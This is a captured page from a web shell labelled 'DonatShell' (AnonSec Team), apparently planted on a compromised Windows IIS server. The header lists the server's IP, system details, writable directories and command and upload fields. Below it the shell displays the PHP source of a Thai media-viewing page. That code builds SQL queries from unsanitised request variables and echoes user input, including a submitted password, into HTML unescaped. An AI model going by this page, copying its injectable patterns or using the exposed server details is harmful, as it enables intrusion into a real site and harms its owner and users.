DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.25
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/AppServ/www/umedia3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/AppServ/www/umedia3/index.inc.viewsinglefile.php
<?
	if ($viewsinglefile=="autopick") {
		$viewsinglefile=tmq("select * from media_ftitems where mid='$mid' and (iscover<>'yes' or coveranddisplay='yes') order by ordr,text limit 1");
		if (tmq_num_rows($viewsinglefile)==0) {
			$viewsinglefile=tmq("select * from media_ftitems where mid='$mid' order by ordr,text limit 1");
		}
		$viewsinglefile=tmq_fetch_array($viewsinglefile);
		$viewsinglefile=$viewsinglefile[id];
	}

	$vinfo=tmq("select * from media_ftitems where id='$viewsinglefile' and mid='$mid' ");
	 if (tmq_num_rows($vinfo)==0) {
	 		html_dialog("","Media $viewsinglefile notfound");
			die;
	 }
	 $vinfo=tmq_fetch_array($vinfo);

	if (loginchk_lib("check")==false && $vinfo[needticket]=='yes' && sessionval_get("ticketpass-$vinfo[id]")!="yes") {
		?><BR>
		<BLOCKQUOTE style="display:block; border: darkred 1px outset; background-color: #FFF9EA;padding: 10 10 10 10;"><B style="color: darkred; font-size: 16; ">กรุณายืนยันรหัสผ่าน</B>
		<BR>การรับชมไฟล์นี้จะต้องได้รับอนุญาตจากทางผู้ดูแลเว็บไซท์เสียก่อน<BR>
		หากท่านมีรหัสผ่านที่ทางผู้ดูแลเว็บไซต์มอบให้ กรุณาใส่ลงในช่องด้านล่าง และกดปุ่ม รับไฟล์
		<TABLE align=center>
<FORM METHOD=POST ACTION="index.php">
<INPUT TYPE="hidden" NAME="mode" value="<? echo $mode?>">
<INPUT TYPE="hidden" NAME="mid" value="<? echo $mid?>">
<INPUT TYPE="hidden" NAME="viewsinglefile" value="<? echo $viewsinglefile?>">
<INPUT TYPE="hidden" NAME="setdisplayname" value="<? echo $setdisplayname?>">
<INPUT TYPE="hidden" NAME="ticklogin" value="yes">
					<TR>
			<TD align=center><?
		if ($ticklogin=="yes") {
			echo "<B style='color: darkred;'>ขออภัย รหัสผ่านที่ป้อนมาไม่ถูกต้อง</B> [$ticketpwd]";
		}
		?><BR><INPUT TYPE="text" NAME="ticketpwd" style="font-size: 22; text-align: center; height:30"> <INPUT TYPE="submit" value=" รับไฟล์ "></TD>
		</TR>
		</FORM>
		</TABLE></BLOCKQUOTE>
		<?
		die;
	}

	if ( $vinfo[needticket]=='yes' ) {
		?>		<BLOCKQUOTE style="display:block; border: #655252 1px outset; background-color: #FFF9EA;padding: 10 10 10 10;"><B style="color: #6B3F2C; font-size: 16; ">ไฟล์นี้เป็นไฟล์ที่ต้องได้รับการอนุญาตพิเศษ</B>
</BLOCKQUOTE><?
	}


	 $type=get_fttypecode($vinfo);
		 
	$image_width = 300;
	$image_height= 300;
	$mediapath=get_fturl($vinfo);
	 if ($vinfo[uploadtype]=="url") {
	 } else {
			if ($type=="images") {
				$currentimagesize = getimagesize("$dcrs/_fulltext/$mid/".$vinfo[filename]);
				//printr($currentimagesize);
				$image_width = $currentimagesize[0];
				$image_width_orig=$image_width;
				$image_height= $currentimagesize[1];
				if ($image_width>700) {
					 $image_width=700;
				}
				if ($image_height>550) {
	////////////
	$max=560;
	if (($image_height > $max)) {
		  $sizefactor = (double) ($max / $image_height);
	  } else {
		$sizefactor = 1;
	  }
	  //echo "[$sizefactor]";
	  $image_width=$image_width*$sizefactor;
	  //////////
				}

	if ($image_width<250 ) {
		$image_width=250;
	}
			}
		}
	 $image_width=floor($image_width);
	 $image_height=floor($image_height);
	
	//echo "[$image_width/$image_height]";
	?>
<TABLE cellpadding=0 cellspacing=0 width=773 border=0>
<?
$usename=addslashes($vinfo[text]);;
$useordr=floor($vinfo[ordr]);;
if ($useordr==0) { // never order this
	$snext=tmq("select * from media_ftitems where mid='$mid' and text >'$usename'  and (iscover<>'yes' or coveranddisplay='yes') order by ordr asc, text asc, id desc",false);
	$sprev=tmq("select * from media_ftitems where mid='$mid' and text <'$usename'  and (iscover<>'yes' or coveranddisplay='yes') order by ordr desc, text desc, id asc",false);
} else { // yeah, order by ordr
	$snext=tmq("select * from media_ftitems where mid='$mid' and ordr >'$useordr'  and (iscover<>'yes' or coveranddisplay='yes') order by ordr asc, text asc, id desc",false);
	$sprev=tmq("select * from media_ftitems where mid='$mid' and ordr <'$useordr'  and (iscover<>'yes' or coveranddisplay='yes') order by ordr desc, text desc, id asc",false);
}
if ($setdisplayname!="") {
	$vinfo[text]=$setdisplayname;
} else {
	$fordspname=tmq("select * from media where randid='$mid' ");
	$fordspname=tmq_fetch_array($fordspname);
	$displaydb=tmq_dump("filenamedisplay","id","val");
	$fordspname=$fordspname[filenamedisplay];
	if ($fordspname=="") {
		$fordspname=tmq("select * from filenamedisplay where isdef='yes' ");;
		$fordspname=tmq_fetch_array($fordspname);
		$fordspname=$fordspname[id];
	}
	$fordspname=getlang($displaydb[$fordspname]);
	$fordspname=str_replace('[no]','1',$fordspname);
	$fordspname=str_replace('[text]',stripslashes($vinfo[text]),$fordspname);
	$vinfo[text]=$fordspname;
}
$vinfo[text]=urldecode($vinfo[text]);
?>

<TR valign=top>
<TD colspan=2 style="background-color: cccccc;
border-color: black;
border-style: dashed;
border-width:1px;
padding: 5 5 5 8;"><A name="midnameposition"></A>ชื่อไฟล์: <?

echo (stripslashes($vinfo[text]));;
?></TD>
</TR>
<TR valign=top height=15>
<TD colspan=2 align=right style="padding: 2 10 0 0;" class=smaller2>
<?
$countmoreft=tmq("select * from media_ftitems where mid='$mid' and (iscover<>'yes' or coveranddisplay='yes') ");
if (tmq_num_rows($countmoreft)>1) {
	?><A HREF="#filelist" class=smaller2 style="color:darkred;">มีอีก <?echo number_format(tmq_num_rows($countmoreft)-1)?> ไฟล์แนบมาด้วย<IMG SRC="<?echo $dcrURL?>neoimg/icon-down-arrow-red.gif" WIDTH="19" HEIGHT="14" BORDER="0" align=absmiddle></A> :
<?
}
if (tmq_num_rows($sprev)!=0) {
	 $hasprev="yes";
	 $sprev=tmq_fetch_array($sprev);	?>
		<a style="color:<? echo $fontcolor?>" href="index.php?startrow=<? echo $startrow?>&mode=viewrecord&mid=<? echo $mid;?>&viewsinglefile=<? echo $sprev[id];?>&viewmode=<? echo $viewmode;?>" #midnameposition rel="balloon1" class=smaller2>
  &nbsp;&laquo; <?
  echo getlang("ก่อนหน้า::l::Previous");
		?></a> : <?
		}

?><?
if (tmq_num_rows($snext)!=0) {	
	 $hasnext="yes";
 $snext=tmq_fetch_array($snext);	
		?> : <a style="color:<? echo $fontcolor?>" href="index.php?startrow=<? echo $startrow?>&mode=viewrecord&mid=<? echo $mid;?>&viewsinglefile=<? echo $snext[id];?>&viewmode=<? echo $viewmode;?>" #midnameposition rel="balloon2"  class=smaller2><?
  echo getlang("ถัดไป::l::Next");
  ?> &raquo;&nbsp;</a> 
<?}
		?>
<div id="balloon1" class="balloonstyle" style="width: 120px; background-color: #B9EFFF; padding: 0 0 0 0">
<TABLE style="background-color: #B9EFFF" width=100%>
<TR>
	<TD><?
	if ($hasprev=="yes") {
		index_fticon($sprev,80,60);
	}
		?></TD>
</TR>
</TABLE>
</div>
<div id="balloon2" class="balloonstyle" style="width: 120px; background-color: #B9EFFF; padding: 0 0 0 0">
<TABLE style="background-color: #B9EFFF" width=100%>
<TR>
	<TD><?
	if ($hasnext=="yes") {
		index_fticon($snext,80,60);
	}
		?></TD>
</TR>
</TABLE>
</div>		</TD>
		</TR>

<script>
function local_load(wh) {

}
function local_error(wh) {

}
</script>
<TR valign=top>
		<TD colspan=2>
		
		<TABLE cellpadding=5 cellspacing=0 width=100% border=0><tr><td  unclass=alpha30><?
	 $typetp=tmq("select * from dbfulltext_cate where code='$type'");
	 if (tmq_num_rows($typetp)==0) {
	 		html_dialog("","media_fttype $type notfound");
			die;
	 }
	 $typetp=tmq_fetch_array($typetp);

	 $html=$typetp[dsp];
	 $html=str_replace('[[url]]',$mediapath,$html);
	$uploaddir ="$dcrs/_fulltext/$vinfo[fttype]/$vinfo[mid]/";
	if (file_exists($uploaddir."$vinfo[filename].text.txt")) {
		$atttext=@file_get_contents($uploaddir."$vinfo[filename].text.txt");
		$atttext=base64_decode($atttext);
		$atttext=str_preformat($atttext);
	}
	 $html=str_replace('[[atttext]]',$atttext,$html);
	 $html=str_replace('[fontcolor]',$fontcolor,$html);
	 $html=str_replace('[[urlencode]]',urlencode($mediapath),$html);
	 $html=str_replace('[[imgwidth]]',$image_width,$html);
	 $html=str_replace('[[defaultwidth]]',"100%",$html);
	 $html=str_replace('[[defaultheight]]',450,$html);
	 $html=str_replace('[[default_audiowidth]]',700,$html);
	 $html=str_replace('[[default_audioheight]]',450,$html);
	 $html=str_replace('[[mediaid]]',$vinfo[id],$html);
	 $html=str_replace('[[mid]]',$mid,$html);	 
	 $html=stripslashes($html);

?><div style="display:block; position: relative; text-align:left; width:100%" 
onmouseover="local_overdisplay();"  onmouseout="local_outhide();"
><?
		echo $html;


				?>
<script type="text/javascript" src="annimg.js"></script>
<link rel="stylesheet" href="annimg.css">
<SCRIPT LANGUAGE="JavaScript">
<!--
	globaltitlestr="";
//-->
</SCRIPT>
<!-- <map name="intermediaannomap" ID="intermediaannomap">
 --><?
$mapp=tmq("select *,(width*height) as region from media_ftitems_anno where ftid='$viewsinglefile' and mid='$mid' order by (width*height) asc");	
$origwidth=$image_width_orig;
$newwidth=$image_width;
function localscale($val) {
	global $origwidth;
	global $newwidth;
	$tmp=($newwidth*$val)/($origwidth);
	return floor($tmp);
}
	$local_outhidestr="";
	$local_overdisplaystr="";
while ($mappr=tmq_fetch_array($mapp)) {
	$local_overdisplaystr.="tmp=getobj('divid$mappr[id]');tmp.style.display='block';";
	$local_outhidestr.="tmp=getobj('divid$mappr[id]');tmp.style.display='none';";
	?> 
	<div ID="divid<? echo $mappr[id]?>" alt="<? echo stripslashes($mappr[text]);?>"   onmouseover="tmp=getobj('imgnootdescr'); tmp.innerHTML='<? echo addslashes($mappr[text]);?>';tmp.style.top='<? echo localscale($mappr[y2])?>';tmp.style.left='<? echo localscale($mappr[x1])+12?>'; tmp.style.display='block'; this.style.background=''; this.style.borderStyle='dotted'; return false; " 
	onmouseout="tmp=getobj('imgnootdescr'); tmp.style.display='none';  this.style.background='url(../neoimg/alpha30.png)'; this.style.borderStyle='solid'; this.style.display='block'; return false;";
	onmousemove=" this.style.display='block';"
        shape="rect" 
		coords="<? echo localscale($mappr[x1])?>,<? echo localscale($mappr[y1])?>,<? echo localscale($mappr[x2])?>,<? echo localscale($mappr[y2]);?>" 
		style="display:none; border: 1px solid white; position:absolute; 
		left:<? echo localscale($mappr[x1])?>;
		top: <? echo localscale($mappr[y1])?>;
		width:<? echo localscale($mappr[x2])-localscale($mappr[x1])?>; 
		height: <? echo localscale($mappr[y2])-localscale($mappr[y1])?>;
		background: url(../neoimg/alpha30.png);"></div>
<?
}
?><div id=imgnootdescr style="position: absolute;display:none;background: url(../neoimg/alpha70.png); font-size:12; padding: 2 2 2 2;"></div>
</div>
<SCRIPT LANGUAGE="JavaScript">
<!--
	function local_overdisplay() {
		<?echo $local_overdisplaystr?>
	}
	function local_outhide() {
		<?echo $local_outhidestr?>
	}
//-->
</SCRIPT>
	 <?

		//echo $mediapath;
		?><font style='color: aaaaaa;text-align:left' class=smaller><img src='./_tmp/mediatype/<? echo $typetp[code]?>.png' align=absmiddle width=24 height=24> <?
	echo getlang($typetp[name]);

	/////start exif engine
	$vinfo[exifdata]=base64_decode($vinfo[exifdata]);
	//echo $vinfo[exifdata];
	$vinfo[exifdata]=trim($vinfo[exifdata]);
	$vinfo[exifdata]=stripslashes($vinfo[exifdata]);
	$tmp=explodenewline($vinfo[exifdata]);
	//printr($tmp);
	$exifdisplay=barcodeval_get("sysconfig-o-exiftodisplay");
	@reset($tmp);
	$tmptextexif="";
	while (list($k,$v)=each($tmp)) {
		$findme=explode(':',$v);
		//printr($findme);
		$findmes=trim("".$findme[0]).",";
		$keystr=trim("".$findme[0]);
		//echo "$findme";
		$possearch = strpos($exifdisplay, $findmes);
		//	echo "[$exifdisplay===$findme-$possearch]";
		if ($possearch=== false || strlen($findmes)<3) {
		} else {
			$tmptextexif.= "<b class=smaller>$keystr</b>: $findme[1]<br>";
		}
	}
	$tmptextexif2=str_replace($newline,'',$tmptextexif);
	$tmptextexif2=trim($tmptextexif2);
	/////end exif engine
	if ($type=="images" && $vinfo[uploadtype]=="upload" ) {
		if (file_exists("$dcrs/_fulltext/$vinfo[mid]/$vinfo[filename].orig.jpg")) {
			?> :: <a href="<? echo $mediapath?>.orig.jpg" target=_blank style='color:<? echo $fontcolor?>' class=smaller><img src="./neoimg/zoom.png" width=16 align=absmiddle border=0 > Full size</a>
			<?
		}
	}

	if (strlen($tmptextexif2)>=20) {
		?> :: <a href="javascript:animatedcollapse.toggle('exifinfo');animatedcollapse.hide('annotateinfo')" style='color:<? echo $fontcolor?>' class=smaller><img src="./neoimg/exif.png" width=16 align=absmiddle border=0 > Exif info</a>
<?
	}

	$is_annotation=library_gotpermission("metadata-annotation");
	//echo "[$type]";
	if ($type=="images" && $vinfo[uploadtype]=="upload" && $vinfo[annostr]!="") {
		?> :: <a href="javascript:animatedcollapse.toggle('annotateinfo');animatedcollapse.hide('exifinfo')" style='color:<? echo $fontcolor?>' class=smaller><img src="./neoimg/balloon.png" align=absmiddle border=0 > Annotation</a>
		<?
	}
	if ($is_annotation==true && $type=="images" && $vinfo[uploadtype]=="upload") {
		?> :: <a href="index.php?mode=annotation&mid=<? echo $mid;?>&viewsinglefile=<? echo $viewsinglefile;?>&displayannotationform=yes" style='color:<? echo $fontcolor?>' class=smaller><img src="./neoimg/annotation_edit.png" align=absmiddle border=0 >  Edit Annotation</a>
		<?
	}
?></font>
</td></tr></table>
		
		<?

		//echo "[$tmptextexif2]";

if (strlen($tmptextexif2)>=20) {
		?>		
<div id="exifinfo"style="width: 100%; display:none; padding: 5 5 5 5">
<TABLE  class=alpha50 cellpadding=10 cellspacing=0 width=100% border=0 ><tr><td><FONT 
class=smaller><? 
echo $tmptextexif;
?></FONT><HR>
<a href="javascript:animatedcollapse.hide('exifinfo');animatedcollapse.hide('annotateinfo')" style='color:<? echo $fontcolor?>' class=smaller>Close Exif info</a></td></tr></table>
</div>
<?
	}
if (strlen($vinfo[annostr])!="") {
		?>		
<div id="annotateinfo"style="width: 763; display:block; padding: 5 5 5 5; background-color: #E3EDF0; margin-bottom: 5">
<TABLE  class=alpha50 cellpadding=3 cellspacing=0 width=100% border=0>
<tr><td>
<TABLE width=100% cellpadding=3>
<TR>
	<TD class=alpha70><A name="annolisted"><B>Annotations for:<? echo stripslashes($vinfo[text]) ?></B></A></TD>
</TR>
</TABLE><? 

$mapp=tmq("select * from media_ftitems_anno where ftid='$viewsinglefile' and mid='$mid' order by height desc ");	
while ($mappr=tmq_fetch_array($mapp)) {
	$strsearch=urlencode('"'.$mappr[text].'"');
	$annolink="index.php?mode=searching&kw=$strsearch&searchindex=annostr";
	?><TABLE width="<? echo $mappr[width]?>" style="float:left">
	<TR>
		<TD class="alpha70" align=center ><A HREF='<? echo $annolink;?>' class="smaller2"><? echo stripslashes($mappr[text]);?></A></TD>
	</TR>
	<TR>
		<TD><A HREF='<? echo $annolink;?>'><img style='background-image: url(<? echo $mediapath?>);width: <? echo $mappr[width]?>; height:<? echo $mappr[height]?>;
	background-position: -<? echo $mappr[x1]?> -<? echo $mappr[y1]?>;'
	src="./neoimg/spacer.gif" border=1 ALT="<? echo stripslashes($mappr[text]);?>" TITLE="<? echo stripslashes($mappr[text]);?>"
	></A></TD>
	</TR>
	</TABLE>
<?
}

?></td></tr></table>
</div>
<?
	}
	?>
		</TD>
</TR>
</TABLE>

Anon7 - 2022
AnonSec Team